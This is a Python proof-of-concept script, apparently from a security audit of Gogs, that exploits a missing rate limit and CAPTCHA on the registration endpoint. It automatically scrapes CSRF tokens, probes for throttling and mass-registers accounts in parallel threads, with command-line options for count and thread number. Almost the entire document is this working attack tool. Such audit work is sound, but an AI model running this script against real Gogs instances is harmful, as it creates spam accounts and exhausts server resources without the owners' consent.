The registration endpoint does not implement IP-level rate limiting, and CAPTCHA is disabled by default. Attackers can automate the creation of a large number of accounts to abuse resources.
#!/usr/bin/env python3
"""
CHAIN-004 (Step 1+2): Batch Account Registration PoC
=====================================================
VERIFIED: 2026-03-11
Vulnerabilities Exploited:
- VULN-003: No rate limiting on registration endpoint
- VULN-012: CAPTCHA disabled by default
Severity: High
CVSS 3.1: 7.5 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Attack Description:
Gogs registration endpoint has no rate limiting and CAPTCHA is disabled
by default. This allows attackers to automatically create unlimited
accounts at high speed.
Impact:
- Mass account creation for spam/abuse
- Resource exhaustion (disk, database)
- Platform for distributed attacks
- Reputation damage to the Gogs instance
- Potential use in credential stuffing attacks
Prerequisites:
- Target allows public registration (DISABLE_REGISTRATION = false)
- CAPTCHA not enabled (ENABLE_REGISTRATION_CAPTCHA = false, default)
Author: Security Audit Team
Date: 2026-03-11
"""
import requests
import sys
import re
import json
import argparse
import time
import random
import string
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Lock
class BatchRegistrationExploit:
    """Audit helper that checks a sign-up endpoint for missing abuse controls.

    The class talks to ``<base_url>/user/sign_up`` and records, as evidence,
    whether registration is open, whether a CAPTCHA appears on the form, and
    whether repeated registrations get throttled.

    Attributes:
        base_url: Target base URL with any trailing slash removed.
        verbose: When True, ``log`` prints timestamped progress messages.
        lock: Guards the counters and account list against concurrent
            updates from worker threads.
        created_accounts: Credentials (username/email/password dicts) of the
            accounts registered by the most recent operation.
        failed_attempts: Number of failed registrations in the current batch.
        total_attempts: Number of registrations attempted in the current batch.
    """

    # HTTP status code used to signal request throttling (RFC 6585).
    RATE_LIMIT_STATUS = 429

    def __init__(self, base_url: str, verbose: bool = True):
        self.base_url = base_url.rstrip('/')
        self.verbose = verbose
        self.lock = Lock()
        self.created_accounts = []
        self.failed_attempts = 0
        self.total_attempts = 0

    def log(self, message: str, level: str = "INFO"):
        """Print ``message`` with a millisecond timestamp and a level marker.

        Does nothing when ``verbose`` is False. Unknown levels fall back to
        the ``[*]`` marker.
        """
        if self.verbose:
            # %f yields microseconds; dropping the last 3 digits gives ms.
            timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3]
            symbols = {"INFO": "[*]", "SUCCESS": "[+]", "FAIL": "[-]", "ERROR": "[!]", "WARN": "[~]", "STAT": "[#]"}
            print(f"{timestamp} {symbols.get(level, '[*]')} {message}")

    def extract_csrf(self, html: str) -> str:
        """Return the ``_csrf`` form token found in ``html``, or ``""``."""
        match = re.search(r'name="_csrf"\s*value="([^"]+)"', html)
        return match.group(1) if match else ""

    def generate_random_string(self, length: int = 8) -> str:
        """Return ``length`` random lowercase letters/digits (not crypto-safe)."""
        return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

    @staticmethod
    def _classify_response(status_code: int, body: str) -> tuple:
        """Map a sign-up POST response to ``(success, error_message)``.

        A 302 redirect is treated as success. A 429 is reported explicitly
        so callers can recognise throttling instead of a generic HTTP error.
        """
        if status_code == 302:
            return True, None
        if status_code == BatchRegistrationExploit.RATE_LIMIT_STATUS:
            return False, "HTTP 429 (too many requests)"
        lowered = body.lower()
        if "already" in lowered or "taken" in lowered:
            return False, "Username/email already exists"
        return False, f"HTTP {status_code}"

    @staticmethod
    def _is_rate_limited(result: dict) -> bool:
        """Return True when a registration result indicates throttling.

        Checks the recorded HTTP status first, then falls back to the same
        error-text heuristics ("rate" / "too many") the text-only check used.
        """
        if result.get("status_code") == BatchRegistrationExploit.RATE_LIMIT_STATUS:
            return True
        error_text = str(result.get("error", "")).lower()
        return "rate" in error_text or "too many" in error_text

    def check_registration_enabled(self) -> dict:
        """Check if registration is enabled and CAPTCHA status.

        Returns:
            Dict with ``registration_enabled`` and ``captcha_enabled`` flags
            plus ``error`` (``None``, or the request failure message when the
            sign-up page could not be fetched).
        """
        result = {"registration_enabled": False, "captcha_enabled": False, "error": None}
        try:
            resp = requests.get(f"{self.base_url}/user/sign_up", timeout=10)
        except requests.RequestException as exc:
            # Keep the best-effort contract (no raise) but report why the
            # probe failed instead of silently claiming "disabled".
            result["error"] = str(exc)
            return result

        # The final URL must still be the sign-up page after any redirects.
        if resp.status_code == 200 and "sign_up" in resp.url:
            result["registration_enabled"] = True
            # "recaptcha" contains "captcha", so one substring test suffices.
            if "captcha" in resp.text.lower():
                result["captcha_enabled"] = True
        return result

    def register_account(self, username: str, email: str, password: str) -> dict:
        """Register a single account.

        Fetches the sign-up form for its CSRF token, then submits it. Never
        raises: any failure is reported through the returned dict.

        Returns:
            Dict with ``success``, ``username``, ``email``, ``error`` and
            ``status_code`` (HTTP status of the last response received, or
            ``None`` if no response was obtained).
        """
        result = {
            "success": False,
            "username": username,
            "email": email,
            "error": None,
            "status_code": None
        }
        try:
            # Context manager closes the session's connection pool; a fresh
            # session per attempt would otherwise leak sockets in a batch.
            with requests.Session() as session:
                # Get registration page and CSRF
                resp = session.get(f"{self.base_url}/user/sign_up", timeout=10)
                result["status_code"] = resp.status_code
                if resp.status_code == self.RATE_LIMIT_STATUS:
                    # A throttled form fetch must not be misreported as a
                    # missing CSRF token.
                    result["error"] = "HTTP 429 (too many requests)"
                    return result
                csrf = self.extract_csrf(resp.text)
                if not csrf:
                    result["error"] = "No CSRF token"
                    return result
                # Submit registration
                resp = session.post(
                    f"{self.base_url}/user/sign_up",
                    data={
                        "_csrf": csrf,
                        "user_name": username,
                        "email": email,
                        "password": password,
                        "retype": password
                    },
                    # Redirects are not followed so the 302 itself is visible.
                    allow_redirects=False,
                    timeout=10
                )
                result["status_code"] = resp.status_code
                result["success"], result["error"] = self._classify_response(
                    resp.status_code, resp.text
                )
        except Exception as e:
            # Deliberately broad: this is the per-attempt boundary and one
            # failed request must not abort the whole run. The error is
            # recorded, not swallowed.
            result["error"] = str(e)
        return result

    def register_worker(self, index: int, prefix: str, password: str) -> dict:
        """Worker function for parallel registration.

        Builds a unique username/email from ``prefix`` and ``index``, attempts
        the registration, and updates the shared counters under ``lock``.
        """
        username = f"{prefix}_{index}_{self.generate_random_string(4)}"
        email = f"{username}@batch-test.local"
        result = self.register_account(username, email, password)
        with self.lock:
            self.total_attempts += 1
            if result["success"]:
                self.created_accounts.append({
                    "username": username,
                    "email": email,
                    "password": password
                })
            else:
                self.failed_attempts += 1
        return result

    def test_rate_limiting(self, count: int = 20) -> dict:
        """Test if rate limiting exists on registration endpoint.

        Sends up to ``count`` sequential registrations and stops at the first
        response that indicates throttling. Successful registrations are
        appended to ``created_accounts``.

        Returns:
            Dict with ``requests_sent``, ``successful``, ``blocked``,
            ``rate_limited``, ``requests_per_second`` and ``elapsed_seconds``.
        """
        self.log(f"Testing rate limiting with {count} rapid requests...", "INFO")
        results = {
            "requests_sent": 0,
            "successful": 0,
            "blocked": 0,
            "rate_limited": False,
            "requests_per_second": 0,
            "elapsed_seconds": 0
        }
        prefix = f"ratetest_{int(time.time())}"
        password = "RateTest123!"
        start_time = time.time()
        for i in range(count):
            username = f"{prefix}_{i}"
            email = f"{prefix}_{i}@test.local"
            result = self.register_account(username, email, password)
            results["requests_sent"] += 1
            if result["success"]:
                results["successful"] += 1
                self.created_accounts.append({
                    "username": username,
                    "email": email,
                    "password": password
                })
            elif self._is_rate_limited(result):
                results["blocked"] += 1
                results["rate_limited"] = True
                break
        elapsed = time.time() - start_time
        results["requests_per_second"] = round(results["requests_sent"] / elapsed, 2) if elapsed > 0 else 0
        results["elapsed_seconds"] = round(elapsed, 2)
        return results

    def batch_register(self, count: int, threads: int = 5, prefix: str = None) -> dict:
        """Register multiple accounts in parallel.

        Resets ``created_accounts`` and the attempt counters, then runs
        ``count`` registrations on a thread pool.

        Args:
            count: Number of registrations to attempt.
            threads: Worker threads; values below 1 are treated as 1.
            prefix: Username prefix; defaults to ``batch_<unix time>``.

        Returns:
            Dict with ``requested``, ``created``, ``failed``,
            ``elapsed_seconds``, ``accounts_per_second`` and ``accounts``.
        """
        if not prefix:
            prefix = f"batch_{int(time.time())}"
        password = "BatchTest123!"
        self.log(f"Starting batch registration: {count} accounts with {threads} threads", "INFO")
        self.created_accounts = []
        self.failed_attempts = 0
        self.total_attempts = 0
        start_time = time.time()
        # ThreadPoolExecutor rejects max_workers <= 0 with ValueError.
        with ThreadPoolExecutor(max_workers=max(1, threads)) as executor:
            futures = [
                executor.submit(self.register_worker, i, prefix, password)
                for i in range(count)
            ]
            for future in as_completed(futures):
                # Normal results are tallied inside the worker; only an
                # unexpected worker crash needs accounting here.
                exc = future.exception()
                if exc is not None:
                    with self.lock:
                        self.total_attempts += 1
                        self.failed_attempts += 1
                    self.log(f"Worker failed unexpectedly: {exc}", "ERROR")
        elapsed = time.time() - start_time
        return {
            "requested": count,
            "created": len(self.created_accounts),
            "failed": self.failed_attempts,
            "elapsed_seconds": round(elapsed, 2),
            "accounts_per_second": round(len(self.created_accounts) / elapsed, 2) if elapsed > 0 else 0,
            "accounts": self.created_accounts
        }

    def run_exploit(self, batch_count: int = 10, threads: int = 5) -> dict:
        """Run full batch registration exploit.

        Steps: (1) prerequisite check, (2) sequential rate-limit test,
        (3) parallel batch registration. Banner lines are printed
        unconditionally; progress lines go through ``log``.

        Returns:
            Report dict with ``vulnerable``, ``evidence`` (per-step results),
            ``created_accounts`` (every account registered during this run,
            from both the rate-limit test and the batch) and ``error``.
        """
        result = {
            "vulnerable": False,
            "target": self.base_url,
            "chain_id": "CHAIN-004",
            "chain_name": "Batch Account Registration (Step 1+2)",
            "vulnerabilities": ["VULN-003", "VULN-012"],
            "severity": "High",
            "evidence": {},
            "created_accounts": [],
            "error": None
        }
        print("\n" + "=" * 65)
        print("CHAIN-004 (Step 1+2): Batch Account Registration")
        print("=" * 65)
        print(f"Target: {self.base_url}")
        print(f"Batch Count: {batch_count}")
        print(f"Threads: {threads}")
        print("=" * 65 + "\n")

        # Step 1: Check prerequisites
        self.log("Step 1: Checking prerequisites...", "INFO")
        prereq = self.check_registration_enabled()
        result["evidence"]["prerequisites"] = prereq
        if not prereq["registration_enabled"]:
            if prereq.get("error"):
                # Distinguish "could not reach the target" from "disabled".
                self.log(f"Prerequisite check failed: {prereq['error']}", "ERROR")
                result["error"] = f"Prerequisite check failed: {prereq['error']}"
            else:
                self.log("Registration is disabled", "ERROR")
                result["error"] = "Registration disabled"
            return result
        self.log("Registration is enabled", "SUCCESS")
        if prereq["captcha_enabled"]:
            self.log("CAPTCHA is enabled - batch registration may be blocked", "WARN")
        else:
            self.log("CAPTCHA is disabled (VULN-012 confirmed)", "SUCCESS")
            result["vulnerable"] = True

        # Step 2: Test rate limiting
        print("\n[Step 2: Rate Limiting Test]")
        print("-" * 40)
        accounts_before = len(self.created_accounts)
        rate_test = self.test_rate_limiting(20)
        # batch_register() resets self.created_accounts, so capture the
        # accounts created by the rate test now to keep them in the report.
        rate_test_accounts = list(self.created_accounts[accounts_before:])
        result["evidence"]["rate_limiting_test"] = rate_test
        if rate_test["rate_limited"]:
            self.log(f"Rate limiting detected after {rate_test['requests_sent']} requests", "WARN")
        elif rate_test["successful"] == 0:
            # No throttling seen, but nothing succeeded either: that is not
            # evidence that unlimited registration is possible.
            self.log("Rate limiting test inconclusive: no registration succeeded", "WARN")
        else:
            self.log(f"No rate limiting detected (VULN-003 confirmed)", "SUCCESS")
            self.log(f" → {rate_test['successful']}/{rate_test['requests_sent']} accounts created", "INFO")
            self.log(f" → Rate: {rate_test['requests_per_second']} req/sec", "INFO")
            result["vulnerable"] = True

        # Step 3: Batch registration
        print(f"\n[Step 3: Batch Registration ({batch_count} accounts)]")
        print("-" * 40)
        batch_result = self.batch_register(batch_count, threads)
        result["evidence"]["batch_registration"] = {
            "requested": batch_result["requested"],
            "created": batch_result["created"],
            "failed": batch_result["failed"],
            "elapsed_seconds": batch_result["elapsed_seconds"],
            "accounts_per_second": batch_result["accounts_per_second"]
        }
        # Report every account this run created so all of them can be
        # cleaned up afterwards.
        result["created_accounts"] = rate_test_accounts + batch_result["accounts"]
        self.log(f"Batch registration complete:", "INFO")
        self.log(f" → Requested: {batch_result['requested']}", "INFO")
        self.log(f" → Created: {batch_result['created']}", "SUCCESS")
        self.log(f" → Failed: {batch_result['failed']}", "INFO")
        self.log(f" → Time: {batch_result['elapsed_seconds']}s", "INFO")
        self.log(f" → Rate: {batch_result['accounts_per_second']} accounts/sec", "INFO")
        if batch_result["created"] > 0:
            result["vulnerable"] = True

        # Show created accounts
        if batch_result["accounts"]:
            print(f"\n[Created Accounts]")
            print("-" * 40)
            for acc in batch_result["accounts"][:10]:
                self.log(f" {acc['username']} / {acc['email']}", "SUCCESS")
            if len(batch_result["accounts"]) > 10:
                self.log(f" ... and {len(batch_result['accounts']) - 10} more", "INFO")

        # Summary
        print("\n" + "=" * 65)
        if result["vulnerable"]:
            print("VULNERABILITY CONFIRMED!")
            print("=" * 65)
            self.log("Batch registration successful without rate limiting", "SUCCESS")
            self.log(f"Total accounts created: {len(result['created_accounts'])}", "INFO")
            self.log("Attack impact: Mass account creation for abuse", "WARN")
        else:
            print("NOT VULNERABLE")
            print("=" * 65)
        return result
def main():
    """Command-line entry point.

    Parses the target URL and options, runs the exploit, prints a JSON
    summary (with the account list replaced by a count), and exits with
    status 0 when the target is reported vulnerable, 1 otherwise.
    """
    # Kept flush-left on purpose: RawDescriptionHelpFormatter prints the
    # epilog verbatim, so any indentation here would appear in --help.
    usage_notes = """
Example:
# Create 10 accounts with 5 threads
python3 poc_CHAIN_004_batch_register.py http://localhost:3000 -c 10 -t 5
# Stress test with 50 accounts
python3 poc_CHAIN_004_batch_register.py http://localhost:3000 -c 50 -t 10
Vulnerabilities Tested:
VULN-003: No rate limiting on registration
VULN-012: CAPTCHA disabled by default
"""
    cli = argparse.ArgumentParser(
        description="CHAIN-004 (Step 1+2): Batch Account Registration PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=usage_notes,
    )
    cli.add_argument('target_url', help='Target Gogs URL')
    cli.add_argument('-c', '--count', type=int, default=10, help='Number of accounts to create (default: 10)')
    cli.add_argument('-t', '--threads', type=int, default=5, help='Number of threads (default: 5)')
    cli.add_argument('-q', '--quiet', action='store_true', help='Quiet mode')
    opts = cli.parse_args()

    runner = BatchRegistrationExploit(opts.target_url, verbose=not opts.quiet)
    outcome = runner.run_exploit(opts.count, opts.threads)

    divider = "=" * 65
    print("\n" + divider)
    print("RESULT SUMMARY")
    print(divider)

    # Print summary without full account list: copy the report, swap the
    # list of credentials for its length.
    digest = dict(outcome)
    accounts = digest.pop("created_accounts")
    digest["accounts_created_count"] = len(accounts)
    print(json.dumps(digest, indent=2, ensure_ascii=False))

    if outcome["vulnerable"]:
        sys.exit(0)
    sys.exit(1)


# Run the CLI only when executed as a script, not when imported.
if __name__ == "__main__":
    main()